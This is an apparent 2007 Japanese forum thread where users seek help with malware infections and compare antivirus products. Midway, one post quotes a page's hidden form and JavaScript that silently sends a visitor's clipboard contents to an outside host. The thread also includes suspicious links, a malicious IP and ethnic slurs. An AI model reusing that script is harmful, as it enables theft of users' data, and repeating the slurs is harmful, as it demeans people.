ウイルスバスターにもonecareにも引っかからないみたい。

>>114
whiter ならダウンロード板かな？

>>113
ime.nu外せ。鑑定は初級ネット板でどうぞ。

>>114
原田じゃねーの? >>13

http://pc11.2ch.net/test/read.cgi/sec/1126151563/273-278

>>114
ウイルスバスターとonecareを信用してるようじゃね・・・

>>108
エスパー発見

失礼します。ちょっと質問させてください。
以前ウイルスに感染しました。
最新アップデートを行ったAVGとspybot両方でフルスキャンを通常状態とセーフモードで
かけたところとりあえず症状は出なくなりましたが、その頃から
インターネットエクスプローラーの
ツール→インターネットオプション→プライバシーの
cookieの設定を中などに設定してもしばらくすると勝手に低（すべてのcookieを受け入れる）
に変わってしまうようになりました。これはウイルスかスパイウェアの活動によるものでしょうか？
詳しい方のアドバイスお願いします。

以下補足ですが、
ウイルス感染中に
c\windowsフォルダ内に
*****.exe（５桁の数字）
eraseme_*****.exe（同上）
が複数増殖してAVGがたまにその一部を削除していく、
という症状が出ていました。
また、ダイアラー（delsim ダイアラ）が勝手に立ち上がったり
インターネットエクスプローラーが勝手に立ち上がり広告サイトが
勝手に開くこともありました。

OSはウィンドウズ2000、
使用しているウイルス対策ソフトはAVG、
スパイウェア対策はspybot-Search & Destroy
です。

>>120
スパイウェアの中にはブラウザの設定を落として、
次々と他のスパイウェアを呼び寄せる悪質なのがあります

2000でFW無しなのかねえ
とりあえず>>9ぐらいやれと。

こんばんは。
セキュリティソフトがＩＰを遮断しますか？と出たＩＰを調べたら
http://www.apnic.net/db/dbcopyright.html
から何回もアクセスされていました。
このサイトはどんな機関なのでしょうか？
わかる方、教えてください。

123ですが、表示されていたＩＰは125.54.39.204です。
よろしくお願いします。

KD125054039204.ppp-bb.dion.ne.jp

>>123
俺も以前そこから執拗なアクセスされたことある。
全部ルーター＆FWが弾いたけど、何回もしつこいよな
うちはガード固いんだから、とっとと諦めろって言ってやりたい

なんなんだ？APNICって

もしかして釣り？　それともボケ？

最近しばしばshare のdown フォルダにPrevHost というフォルダと、その中にindn.dat というファイルが自動で生成されることがあります。
ググっても、share の質問スレで聞いても回答が得られなかったのですが、何だか分かる方いましたら教えてください。

>>127
ＩＤが変わっていますが123です。
釣りでもないし、ボケているつもりもありません。。
さっきから同じような感じで６回もアタックされました。
こんな事は初めてで何かわかりません。
これは一体何なのか教えていただけますか？

APNICは君が逆引きで調べたWhoisそのもの
ちなみにそのIPはKDDI（DION)　>>125

じゃあAPNICからアタックがあったポートは
別に開放しちゃっても問題ないんですか？

だからAPNICからアタックされてるんじゃないって
アッタクしてるのはどっかの感染者か踏み台にされてるPC

言い忘れたけどそういうアタックは日常茶飯事的にある
うちもルーターのログを見ればいっぱいあるから

なるほど。なんとなく理解できました。
安心しました。ありがとうございました。

123です。
皆さん、丁寧に教えて下さってありがとうございました。
私も一安心しました。
ファイヤーウォールのソフトにも感謝して寝る事にします。
おやすみなさい。

age

【使用OS】　「WindowsXP」
【使用セキュリティソフトとバージョン】　「NTTセキュリティ対策ツールver15」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「最新です」　
【スパイウェア対策ソフト】　「NTTセキュリティ対策ツールver15」　
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「しています」
【ルータの有無】　「有」

【スキャンの結果何が検出されたか】
・TSPY_Backdoor
・検出リソース→ C:WINDOWS\system32\drivers
・検出対象→Zcsfzdjh.sys

検出して削除はしたのですが、トロイの木馬として検出されたので
まだ不安です。ぐぐってみてもバックドアは色んな種類が居て、どんな悪さをするのかよく解りません。
TSPY Bsckdoorで検索をかけてみましたが、見つけられませんでした。
対処はこれでよかったのか、それとどんな症状が出るのか教えて欲しいです。
PC初期化したほうがいいんですかね・・？

>137
不正ドライバか？
＞Zcsfzdjh.sys

削除したんなら問題ないと思うけどな…

Zcsfzdjhでファイルとレジストリ検索しといたほうがいいんじゃね

ありがとうございます。
ファイル検索では引っかかりませんでした。
レジストリ検索っていうのは、ぐぐったら出てくるレジストリ検索のソフト使えばいいのかな？
あと、一応ネット通販とかのパスワードを変更しておいたほうがいいですかね？

＞レジストリ検索
俺はこれを愛用してる
RegGlass
ttp://hp.vector.co.jp/authors/VA037892/regglass/regglass.html

只今ノートンスレにて炎上中の話題。

昨夜の定義ファイル更新でBackdoor検出。
Backdoor_Haxdoor: 「c:\WINDOWS\sysytem32\drivers\CO_Mon.sys」

「シマンテックのオンラインスキャンでウイルス検出を実行した際にダウンロードされるCO_Mon.sysで
Backdoor.Haxdoorが検出される。」
「シマンテックのオンラインスキャン以外にもCO_Mon.sysが入る経路があるのかも知れん」

感染経路は？本当にBackdoor？等、いまだに詳細は不明。

【ﾉｰﾄﾝ】ｲﾝﾀｰﾈｯﾄｾｷｭﾘﾃｨ Ver.113【2007】
http://pc11.2ch.net/test/read.cgi/sec/1178603986/486

騒いでるの一人だけじゃん…。
普通にどこかで踏んだんだろ。

>142
誤検出だったという展開になってるようだけど。

c:\windows\ntbtlog.txtに
「Loaded driver \SystemRoot\System32\Drivers\CO_Mon.sys」が
存在しないか確認を。無いと思うけどね。

ほんとにhaxdoorだったらえらいこっちゃ

Rootkitだもんな

>144
そのc:\windows\ntbtlog.txtってなんなの？
spybotがいつも反応するんでセーフモードで消したけど、すぐ復活するし。
頭にきてOS再インスコしたけどたかまた出てくるんだが。

>147
ブートのログ
起動時に読み込まれた（または読み込まれなかった）ドライバが表示される

F8起動オプションの、セーフモードで起動した時や、
「ブートのログ作成を有効にする」を選んで起動した時に作成される。
（一旦作成してしまうと、起動する度に内容が追記されてサイズが増えて行く）

すまんタスクマネージャーにtgui.exeってのとtgsvc.exeっていうのが急に出現してメモリ使いまくってるんだがこれってなんなのかわかる奴いない？
最近ウィルス踏んだばっかりだから気になるんだが…

>>141
ありがとうございました。
何も引っかかりませんでした。

これで一安心なのかな・・？
アドバイスくれた皆様、ありがとうございました〜

>>149
検索すらしないのかよ

>>151
だからみんなスルーしてるだろ

了解。

　　　 人
　〜(　○)　
　　 (_ ﾟTﾟ　　
　　　ﾟ￣ﾟ

ttp://omanchin.com/railway/omanchin.cgi/img/img2006070189.jpg

これってどういうものですか？
ノートンが反応するそうです。
解説お願いします。

>>155
クリップボードのデータを盗まれたお・・おっおっおっ

>>155
これ、JPGじゃねーよ。

>>155
※ clipboardData.getDataが使われているようです。
以後こちらへどうぞ
勇気がなくて踏めない人のための鑑定ｽﾚPart14
http://pc11.2ch.net/test/read.cgi/hack/1177503872/

DR,webもブラクラチェックも大丈夫そうだが、
チキンな俺は踏まない。

つか、>>155危険なリンク貼るな。スレ違いだボケ
専ブラで画像自動表示してる人だっているんだから、
少しでも危険なリンク貼るならht位まで消してから貼れ。今度やったら通報する。

>>155
※ clipboardData.getDataが使われているようです。

<form method="post" name="bbs" action="http://omanchin.com/railway/omanchin.cgi">
<input type="hidden" name="paste" value="">
<INPUT type="hidden" name="k" value="あ">
<INPUT type="hidden" name="chktime" value="1179759460">
<INPUT type="hidden" name="title" value="">
</form>
<script type="text/javascript">
<!--
document.bbs.paste.value = clipboardData.getData("Text");
document.bbs.submit ();
// -->
</script>

クリップボードのデータを送信しちゃいますよ〜って。

「このWebページがクリップボードへアクセスするのを許可しますか?」→「許可しない」
さすがIE7、なんともないぜ。

クリップボードのデータ送信されたら
あんなエロイ事や、こんなエロイ事を検索したのがバレちゃうじゃんか！！１１１！！！１

ウイルスコードをクリップボードにコピーして踏めばいいんじゃね?

>>164
ｗ

>>159
馬鹿ですか？
聞くまでもなく馬鹿ですよね

clipboardData.getDataって取得できるサイズに制限無いの？

50MBのテキストコピーして踏んでみたが、ちゃんと送信されてるっぽい。

あ、違った。5MBだった。

制限無いんじゃね?
メモリ食いつぶすまで行けると思うが、先にクリップボードが死ぬかと。

>>159
何でお前がこのスレにいるのか分からない。
チキンで踏めもしないのに、此処でグダグダ言うお前って何様？

＞ 専ブラで画像自動表示してる人だっているんだから、

こんな人もセキュやってるんだと思うと笑えてくるよな
pink板へ逝けよ

いきなりブラクラもどき貼る馬鹿よりマシじゃねｗ

>>155
通報しますた

>>155
じゃあ俺も通報しとくわ

じゃあ有名な奴を直リンで
http://www2.strangeworld.org/uedakana/

アク禁になるぞ

アク禁になるだけならまだいいけど、
2ちゃんからプロバイダに連絡行って強制解約になったやつもいるからな

匿名でID出ないからって、あんまり調子に乗ってウイルス貼るのはやめたほうがいい

ゆとり君はほっとけ

とりあえず>>175は通報してアク禁にしちゃいましょう＾＾

>>155は
ttp://omanchin.com/railway/bbs.cgi?c=900 ここの点呼みたいだけどな。

まぁ、なんでもいいけど、訳分からんスレ違いなものを貼るな禿って事だな

愚問かも知れないが教示頂けませんか？
１、LANﾈｯﾄﾜｰｸを共有するｳｨﾙｽ・ｽﾊﾟｲｳｪｱの存在の有無
２、A─B環境で、AにあるｳｨﾙｽをBから起動させると感染するのはA?B?両方？

>>182

1　：　共有の意味がよくわからないけど、以前問題になったMSBlustは、ローカルエリア
内のほかのコンピュータに感染する動作をしていた。また、共有フォルダを破壊、改変する
タイプもある。

２　：　なぜAにウイルスがあるのかが問題。Aがすでにウイルスに感染している可能性も
ある。そうでなければ、Bから起動させた場合、通常感染するのはBだけ。ただし、Aにい
ファイアーウォールソフトがなければ、場合によってはその後Aに感染するリスクはある。
上に書いたような共有フォルダを破壊するようなタイプなら被害はBにも及ぶかもしれない。

いずれにしてもウイルスの挙動は千差万別で、一般論は通用しないので注意してほしい。

>>183
ﾚｽ感謝です　説明が下手で申し訳ないですが
一応把握しました
１、はAが感染していたらBも感染するか聞きたかったんです
２、は「千差万別」＝「する物もある」で理解しました

>なぜAにウイルスがあるのかが問題
ｳｨﾙｽと確定した訳では無いのですが
単に「不明なﾌｧｲﾙ」があると言うことです

JAVAアプレットを立ち上げるとIEが原因でkernel32.dllにエラーが・・・
とでて、強制終了させられます。
avastのフリーソフトでウイルス駆除したのですが改善されません。
システムのなかにjacbgage.dllという不明なものもありました。
どうしたらいいでしょうか・・・・

http://countfuyashi0gokun.blog50.fc2.com/blog-entry-19.html

すみません。このページにウィルスめいたものがあるか調べることは可能でしょうか？？
不安で夜も眠れないのでよろしくお願いいたします。

>>186
セキュリティ初心者質問スレッドpart89
http://pc11.2ch.net/test/read.cgi/sec/1179508837/469
469 名前：名無しさん＠お腹いっぱい。[] 投稿日：2007/05/24(木) 23:02:57
ttp://countfuyashi0gokun.blog50.fc2.com/blog-entry-19.html
すみません。このページにウィルスめいたものがあるか調べることは可能でしょうか？？
不安で夜も眠れないのでよろしくお願いいたします。


誘導されただろ　貼ってもらわないと行けないなら踏め

勇気がなくて踏めない人のための鑑定ｽﾚPart14
http://pc11.2ch.net/test/read.cgi/hack/1177503872/

541 名前：名無しさん＠お腹いっぱい。[] 投稿日：2007/05/24(木) 23:06:48
ttp://countfuyashi0gokun.blog50.fc2.com/blog-entry-19.html

わけのわからないページを踏んでしまいました。このページ内に何か問題はありますでしょうか？
ワープとかいう所がひたすら重かったです・・・。
よろしくお願いいたします。

どれだけﾏﾙﾁするつもりか知らんけど
ﾌﾗｯｼｭ再生するだけだから勝手に踏んだらいい

セキュ板に常駐してる人間をなめてんな
マルチしてもばれないと思ったら大間違いだつうの

新種ルートキット情報
http://pc11.2ch.net/test/read.cgi/sec/1087037111/410

AV-Test.orgという専門機関のアンチウイルス検知力テスト結果（2007年05月22日）
AV-Test.org Reports Stats from Antivirus Roundup
ttp://www.pcmag.com/article2/0,1895,2135053,00.asp

01位）WebWasher　　99.83%
02位）AVK 2007　　　99.56%
03位）AntiVir　　　　　99.42%
04位）F-Secure.　　　97.93%
05位）Symantec　　　97.77%
06位）Kaspersky　　　97.64%
07位）Fortinet.　　　　97.06%
08位）Avast!.　　　　　96.32%
09位）AVG.　　　　　　96.15%
10位）Rising　　　　　　96.02%
11位）BitDefender　　95.68%
12位）Norman..　　　　94.66%
13位）Ikarus..　　　　　92.54%
14位）Panda.　　　　　92.09%
15位）Trend Micro..　90.97%
16位）Nod32.　　　　　88.32%

厨な質問なんだがyoutubeとかニコニコとかの動画サイトでウィルスとかあんの？

>>192
それが人に物をたずねる態度か
死ねクズ蟲
ゴミ収集車に巻き込まれて　頭粉砕されて死ね

まさにそうなって欲しいアホがレスしてるのがなんとも言えないねぇ…

あるある

ねぇねぇ

※アンチウイルスNOD32の脆弱性情報
http://pc11.2ch.net/test/read.cgi/sec/1167829054/540

マルウェア注意

マカフィー・ユーザーのブログに、
ワードパッドなどで簡単に埋め込める悪質なオブジェクトがあることが紹介されていたのでご注意です。

マイクロソフトやマカフィー、シマンテック（ノートン）、kasperuskyなどの
多くの主要なベンダーは、既に対応していますが、
アンラボやNOD32など一部のベンダーは、まだ未対応なので気をつけて下さい。

＊マカフィー・ユーザーの検証ブログ
ttp://www.avertlabs.com/research/blog/index.php/2007/05/25/rich-text-malware/

ユーザーのブログじゃねーよ。
AVERTはMcAfeeの解析チームだ。

単にOLEで埋め込んだだけのように思うのだが・・・
いったい何が危険なんだ？

メールの添付ファイルとして届く→興味を誘うような文章を書く。
クリックするほうがアホｗとか言うならワンクリやフィッシングも対策いらん。

ま、そのブログのエントリはあくまで技術的なネタであって、
トロイとして実用的かどうかは本題じゃないでしょ。

【使用OS】　「XP」
【Microsoft Update（MU）の状態】　「？」　
【使用セキュリティソフトとバージョン】　「internet security 2006(7かも？)」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「更新しています」　
【スパイウェア対策ソフト】　「上記のセキュリティソフトにて」　
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「上記のセキュリティソフトにて」
【ルータの有無】　「有」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「何も検出されず、昨日から突然『セキュリティリスクWscript.kakwormを検出して遮断しました』のようなメッセージが、5分未満の間隔で限りなく・・・」

【どんな症状が出るか】　「例)\Content.IE5\9NJV9DS6\api[1].xml、からWscript.kakwormが検出されて、上記のエラーが。」
【症状が出る前に何をやったか】　「いつもどおりで、これといって特別なことはしていません」
【症状を解決しようとどのような処置を取ったか】　「content.IE5の中のファイルをindexを除き削除しました」
【その他の質問】　「」

content.IE5の中のファイルをindexを除き削除すると、昨夜収まったのですが、
先ほど突然昨夜と同様の症状が・・・。
よくよくcontent.IEを見ていると、消してIEも何も起動していないのに
ファイルが次々出現します・・・（これは正常なのかな？）


すみません、質問しておいて申し訳ないのですが、これから病院にいかなくてはならないので、
どなたか読んでお答えいただければ幸いです

ただいま戻りました。
セキュリティソフトのログを確認したところ、
content.IE5を空にしてから病院に行っている間は
上の症状は出ていなかったみたいです。

しかし、やはりcontent.IE5の中にいくつか、HPの読み込みなどをしていないのに
消してもすぐ出てくるファイルやフォルダが10個強あります。
これについて知っている方がいれば教えていただけますでしょうか？

>>202
http://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2000-121908-3951-99

>>204
返信ありがとうございます
その辺は自分でも探して既に対策を講じてみたのですが
ファイルどころかレジストリも存在しなかったので、
そのページの通りにやっても変化はありませんでした。

何もしていないのに、content.IE5に勝手にファイルが作成されるところが
個人的には変な感じがするのですが、そういう状態について
知っている方がいれば、教えていただければと

>>205
NIS以外のソフトでスパイウエアスキャン。

「何もしていない」という時のプロセスをチェック・接続ログをチェック。
IEのウインドウを表示させなくても通信はできる。

>>206
なるほど

とりあえず何かしらの手段を使ってスパイウェアのスキャンをかけたいと思います。

WORM_SDBOT.EFHが消せません。
タスクでそのプロセスを終了しようとしても終了できませんでした。
このウイルスが削除できなくて、昨日、再インストールしたのですが、
今日の夕方に、すでに同じウイルスに感染。
環境は、CATV、ウイルスバスター2007使用です。
再インストールをもう一度してもいいけど感染経路がわかりません。
本日逝った先は、yahooとヤフオク関連のみ。
どうしていいかわかりません。
詳しい方お願いします。

WORM_SDBOT.EFH
侵入方法：共有フォルダ内に自身のコピーを作成して侵入
セキュリティホールの利用：MS00-035
>感染経路がわかりません
ふ〜ん。わからないんだーw

リッチテキストマルウェアがウイルス対策ソフトの盲点を突く？
ttp://www.itmedia.co.jp/enterprise/articles/0705/28/news011.html

今時分はどうだろ？どこが×でどこが○とはかかれてないけどさ

PCに共有フォルダは設定していません。
２０９さんのレスされたことはTREND MICROに書かれてました。

>>211
管理共有は？

すいませんがどなたか教えてください。
先程、２チャンの動画を見てたら（downloadはしてないです
ハードウェアに不具合がありますみたいな感じのコメントと
英語のコメントが出てきて、エラーになり電源が落ちては再起動になるの繰り返しなんですがウィルスですよね？
素人ですいません。

>>213
>みたいな感じのコメントと
>英語のコメントが
>エラーになり
全部書けｗ
ｳｨﾙｽだと思うならｽｷｬﾝしなされ

スキャンしたいのですが起動してから何をしようにもすぐに電源が落ちてしまい又再起動の繰り返しなんです。
素人でうまく説明できずに本当に申し訳ないです。

>>215
SafeModeで起動後ｼｽﾃﾑの復元では？

すいません。
そのモードはどの様にすればよろしいのでしょうか？

>>217
再起動時にF8を連打！

F8あたりを起動後に連打
詳細はPCの取説（多少機種によって相違あり）

連打してみたら英語の画面になり、f1キーf2キーが何たらと出てきましたがこれのことでしょうか？

後、起動してから落ちるまでの間に、右したの方にユアcomputer ｲﾝﾌｪｸﾃｯﾄﾞ？と書いた題名でアンチｽﾊﾟｲｩｪｱ ﾌｫｰﾕｰみたいな英語が出てくるのですが何でしょうか？
意味わからなくてすいません。

>>220
ﾃﾝﾌﾟﾚ埋めれ、嫌ならﾘｶﾊﾞれ

>>220
ttp://www.higaitaisaku.com/safemode.html

>213
まだ生きてる？
２チャンの動画じゃなくて、youtubeで動画じゃないのか。
ま、症状見るからにして、マルウェアにやられてるってことには違いないが。

>>210
元ねたのマカフィーのブログにはVirusTotalのスクリーンショット載ってるよ
参加してないベンダーの対応状況はわかんないけど

http://www.av-comparatives.org/seiten/ergebnisse/report14.pdf
http://www.itmedia.co.jp/enterprise/articles/0706/02/news013.html
独立組織のAV-Comparatives.orgが6月1日に発表した。
今回の検証は、2月に発表されたウイルス対策ソフト比較の第2弾として、未知の脅威をどの程度事前に検出できるかを検証した。
各ソフトを2月以降アップデートしない状態で、2月2日から5月2日の間に入手した新しいマルウェアサンプルの検出率を調べている。
テストの結果、3段階評価で最も高い「ADVANCED+」の評価を獲得した
「NOD32 Anti-Virus」（ESET）は、68％の確率で新しいマルウェアサンプルを検出した。

最近またNODの工作員必死だなｗ
そんな事してる暇あったら、新　種　の　未　対　応　ウ　イ　ル　ス　どうにかしろよｗ

NOD未対応ウイルスが世界中に溢れてますよｗ
他社は、ほとんど対応してるのにねｗ

NODみたいな糞AVがあると、それを使っている馬鹿信者がウイルス広げて迷惑です＞＜
人の迷惑考えないで糞NOD薦める暇あったら、早く氏んでください。

マルチは基地外の証

いちいち反応するのが一番の基地外

反応する方がキチガイってどういう詭弁だよ
低脳は言うことが違うな

　　基地外　　　詭弁　　　低脳
　 ┏┳┓ 　 　 ハイッ. 　 　┏┳┓
┏┫┃┃ 　 　 差別は 　　┃┃┣┓
┃┃┃┣┓ 　 ここまで ┏┫┃┃┃
┃ 　 　┃┃┏━━━┓┃┃　 　 ┃
┃ 差別　┣┫　･∀･ .┣┫ ダメッ.┃
┗━━━┛┗┳━┳┛┗━━━┛
　 　 　 　 　 ┏┻┓┃
　 　 　 ┏━┛　 ┣┻┓
　 　 　 ┗━━━┫　 ┗━┓
.　　　　　　 　 　　┗━━━┛

認定厨がよく言うｗ

　　　____ 　　 (　) 。
　 〃 ￣ ヾ､ （　) )
　 i!_,.┻ ､!i_ ﾉノ
　/o ￣￣ ノ ﾉ
. i.0 　　　　.ｲ
. ゝ＿_＿__.ノ

朝鮮人の手法です。根拠のないものでも、言い続ける。
面倒だし馬鹿馬鹿しいと反論せず放置してくれれば、
知らない人にとってはそういうものかと感じられるようになり、
それが事実だと認識されるようになる。

と、NOD厨の糞チョンが言ってます。
おまえら在日はまず、年金や税金を俺ら日本人並みにちゃんと払え
屑ゴキブリ氏ね

板違いだ。消えろ。

RTF埋め込み型早速出てきてるみたいだな
http://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY%5FMAHA%2ES&VSect=Td

Trojan.Packed.NsAntiが削除できないんですがどうすればいいでしょうか。
ウィルスソフトはノートンアンチウィルス2006です。

>>237
ttp://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2006-061009-4441-99&tabid=2

>>238
すいません読んだのですがよくわかりませんでした。
何をしたらいいんでしょうか。

Trojan.Packed.NsAnti として検出されたファイルは、有害である可能性があります。
お使いのコンピュータ上で Trojan.Packed.NsAnti として検出されるファイルを発見した場合、
そのファイルを Symantec Security Response へ提出してください。
スキャンと配信機能を使用してファイルを提出する方法については、
「スキャンと配信ウィザードを使用して Symantec Security Response に疑わしいファイルを提出する方法」をご覧ください。

新種のpackerか

【使用OS】　「WinXP MCE2002 SP2　PCは1年前にDELLで通販購入」
【Microsoft Update（MU）の状態】　「最新」　
【使用セキュリティソフトとバージョン】　「ウィルスバスター12　使用期限○」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「○」　
【スパイウェア対策ソフト】　「Ad-aware、Spybot」　
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「○」
【ルータの有無】　「有」
【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
ウィルス名：JAVA-BYTEVER.AY×3
　　　　　　　　ANICMOO.GEN×7
ファイル名：
JAVA-の3つのファイル名は「BaaaaBaa.class」「Baaaaa.class」「VaaaaaaaBaa.class」で拡張子がzipに
なっていました。ANICMOO.GEN×7の方は、拡張子がhtmでした。
【どんな症状が出るか】　
ネットのページが見れなくなったりすることがあります、時間をおくか再起動するとまた
見れるようになる。見れないときは時間を置いてもずっと見れなくなる…翌日は見れることを
祈るしか…の状態です。
【症状が出る前に何をやったか】
　「海外エロアニメサイトへの直リンページを片っ端から覗いていきました
【症状を解決しようとどのような処置を取ったか】　
被害対策の部屋での基本的な事を全部、ルータの異常かもとサポセンに確認
結果ルータの異常ではなくPCの異常の可能性有。システムの復元でも症状治らず。

ウィルス検出時に隔離できなかったファイル達です。隔離してあるものは削除しました。
隔離できなかったこれらのファイルはどのようにして削除するものなのでしょうか…？
直接ファイルが潜んでいる場所を触ってみたりすると危険の様な気がして、直接的に
何もしていません…。どうかアドバイスお願いします

>>242
検出されてるのは、すでにパッチの出てるセキュリティホール狙いのものだから
Microsoft Updateが最新になっていればこいつらは発動しない
隔離できなかったのはブラウザとファイルの取り合いしてたからってパターンが多いんで
ブラウザのキャッシュクリアしてからもう一度スキャン

隔離できなかったこいつらが症状と直接関係ある可能性は小さいと思うが
「海外エロアニメサイトへの直リンページを片っ端から覗いていきました」だからなぁ…

「被害対策の部屋での基本的な事を全部」ってのはなにをどこまでした？

>>225
今回AV-Comparatives.orgのプロアクティブ試験のランク付けは、
一般消費者には、あまり意味のないもの。

ランク付けで最も重視された基準は、本物のウイルスの検出数ではなく、誤検出の数。

ttp://www.av-comparatives.org/seiten/ergebnisse/report14.pdf
↑
この資料の６ページ目に、誤検出数の具体的な個数が書いていましたが、。
Fortinetという製品（1000以上の誤検出）以外は、
全サンプル中で、たった０個から３６個の誤検出に過ぎませんでした。

実際のユーザー環境では、誤検出してもベンダーに真偽を確認すれば済むが、
本物のウイルスを検出できないのは致命的です。

今回からのプロアクティブ性能のランク付けでは、
誤検出が18個で、本物のウイルスを14628個できている製品よりも、
誤検出は8個でも、本物のウイルスは5659個しか検出できていない製品の方がランクが上となっています。

レスありがとうございました。
>243
ttp://www.higaitaisaku.com/menu1.html
の、PCのお掃除、スパイウェア除去、転ばぬ先の杖等です。
Hijackthisでログ取っての質問をして（#91093）、色々指示されたことも
ありますが、解決には至らず…。PCメーカーのサポセンに電話しても、
色々指定されたことをしても効果なしで、再インストールしてくだサイといわれました。
キャッシュクリア後のスキャンも効果なしでした。

すいません、キャッシュクリアってインターネットオプションの
一時ファイルの「Cookieの削除」と「ファイルの削除」のことですよね…？

★ 世界でもっとも権威のある機関 AV-Test.org Reports Stats from Antivirus Roundup 検知力テスト結果 （2007年05月22日） ★
ttp://www.pcmag.com/article2/0,1895,2135053,00.asp

01位）WebWasher　　99.83% (605,846)
02位）AVK 2007　　　99.56% (604,255)
03位）AntiVir　　　　　99.42% (603,408)
04位）F-Secure.　　　97.93% (594,333)
05位）Symantec　　　97.77% (593,355)
06位）Kaspersky　　　97.64% (592,606)
07位）Fortinet.　　　　97.06% (589,028)
08位）Avast!.　　　　　96.32% (584,574)
09位）AVG.　　　　　　96.15% (583,541)
10位）Rising　　　　　　96.02% (582,772)
11位）BitDefender　　95.68% (580,700)
12位）Norman..　　　　94.66% (574,476)
13位）Ikarus..　　　　　92.54% (561,607)
14位）Panda.　　　　　92.09% (558,899)
15位）Trend Micro　90.97% (552,107)

16位）Nod32.　　　　　88.32% (536,043) ←←←←←←←←←←←←←←←←←←←←←←←←←←←←

17位）McAfee　　　　 87.28% (529,680)

★ A v a s t ! 、A V G, ウ イ ル ス キ ラ ー 、 バ ス タ ー より格段に検出力が劣る

N O D ３ ２ (笑)

■NOD32が該当すると思われる専門家の指摘
http://internet.watch.impress.co.jp/cda/event/2007/02/26/14890.html
>ただし、「マイナーなベンダーの検知率が高いというわけではない。中には、ヒューリステックに頼りすぎて、
>ウイルスの検体を集めず、ちゃんとシグネチャを作らないところもある」と補足した。

■新種マルウェアの検出もほとんど駄目
http://pc11.2ch.net/test/read.cgi/sec/1087037111/404

■新種ルートキットの検出も駄目
http://pc11.2ch.net/test/read.cgi/sec/1087037111/410

【使用OS】　「XP」
【Microsoft Update（MU）の状態】　「?」　
【使用セキュリティソフトとバージョン】　「カスペルスキーインターネットセキュリティ6.0」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「されています」　
【スパイウェア対策ソフト】　「Ad-aware SE」　
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「しています」
【ルータの有無】　「有」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「自分のHPを見ると『疑わしいHTTPオブジェクト
<http://81.95.149.28/logo/index.php>: にトロイ 「Trojan-Downloader.JS.Psyme.gr」を検知しました』
と表示されます」
【どんな症状が出るか】「同上」
【症状が出る前に何をやったか】　「いつも見ているサイトから同じトロイが検知されました」
【症状を解決しようとどのような処置を取ったか】　「カスペルスキーを導入・PC内のウイルスを全削除、AD-awareSEでスパイウェアを一掃」
【その他の質問】　「現在脅威はありませんと表示されているのに何故か自分のHPからはトロイが検知されています。
最近になってネットが重くなったのもこのせいでしょうか？
ウイルスに関しては右も左もわからない状態で辟易しています。どうにか自サイトからウイルスが検知されないようにしたいのですがお願いします。」

http://www.av-comparatives.org/seiten/ergebnisse/report14.pdf
http://www.itmedia.co.jp/enterprise/articles/0706/02/news013.html
独立組織のAV-Comparatives.orgが6月1日に発表した。
今回の検証は、2月に発表されたウイルス対策ソフト比較の第2弾として、未知の脅威をどの程度事前に検出できるかを検証した。
各ソフトを2月以降アップデートしない状態で、2月2日から5月2日の間に入手した新しいマルウェアサンプルの検出率を調べている。
テストの結果、3段階評価で最も高い「ADVANCED+」の評価を獲得した
「NOD32 Anti-Virus」（ESET）は、68％の確率で新しいマルウェアサンプルを検出した。

●「PC WORLD」によるNOD32の評価
http://www.pcworld.com/article/id,130869/article.html

"NOD32's overall malware detection rate wasn't stellar, however. When pitted against AV-Test.org's nearly 900,000-strong "zoo"
of Trojans, viruses, and other malware, NOD32 caught only 90 percent, compared to the 96 percent rate of top performers Kaspersky Anti-Virus 6,
Symantec Norton AntiVirus 2007, and BitDefender Antivirus 10. It fared surprisingly poorly with 32-bit Windows viruses (approximately 1 in 11 samples in the zoo), catching only 73 percent.

In disinfection tests, NOD32 cleaned up all malware files but missed resulting changes to the Hosts network settings
file and most of the less-important Registry changes, for a disappointing 55 percent success rate."

しかしながら、NOD32のマルウェアの総合的な検出力はより優れているとはいえない。
AV-Test.orgのトロイ、ウイルス、その他のマルウェアなどの"約90万の"zoo"の検体に対しては、
優秀なカスペルスキー、ノートン、BitDefenderなどが検出率96％の成績を占めるのに比べ、NOD32はたったの90％しか検出しなかった。
情けないことには、32ビットのWindowsウイルスに至っては、たったの73%と驚くほど検出性能が低かった。

除去テストでも、すべてのマルウェアを取り除くことができたが、がっかりしたことには、ホストのネットワークの設定ファイルや
比較的重要ではないレジストリの変更に対しては、55%しか駆除できなかった。

【使用OS】　「ＸＰ」
【Microsoft Update（MU）の状態】　「？」　
【使用セキュリティソフトとバージョン】　「ウィルスバスター」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「○」　
【スパイウェア対策ソフト】　「ウィルスバスター」　
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「○」
【ルータの有無】　「？」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「Neroってソフトについてたウィルス(名前わかりません)」

【どんな症状が出るか】　「タスクマネージャーが開けず、
レジストリをいじって直そうと思っても直せない。
(起動すると
このファイルはほかのプログラムでつかわれています。とでます。)」
【症状が出る前に何をやったか】　「友達からファイル共有ソフトを
使って入手したソフトをもらった。」
【症状を解決しようとどのような処置を取ったか】　「レジストリを起動」
【その他の質問】　「」

初心者であんまりわかりませんがよろしくお願いします。

>>249
「自分のHP」のURLを書いて欲しい
回答に必要な情報なんで

>>252
ご愁傷様。その友達とやらを恨んであげてください

>>252
>>13

>>249
ほぼ確実なこと
　あなたのサイトが改竄されており、閲覧する人を危険にさらしている。
わからんこと
　あなたも感染している。

サイトの該当するiframe(だと思う)を取り除く。
サーバのOSやWebサーバやCGI等に脆弱性が無いかを
(必要ならサーバ管理者に)確認し対処する。
先方がPHPを使っていることからphpBB等は特に注意。
あるいはサイトを(一時的にしろ恒久的にしろ)閉鎖する。

ドメインは中米パナマ。
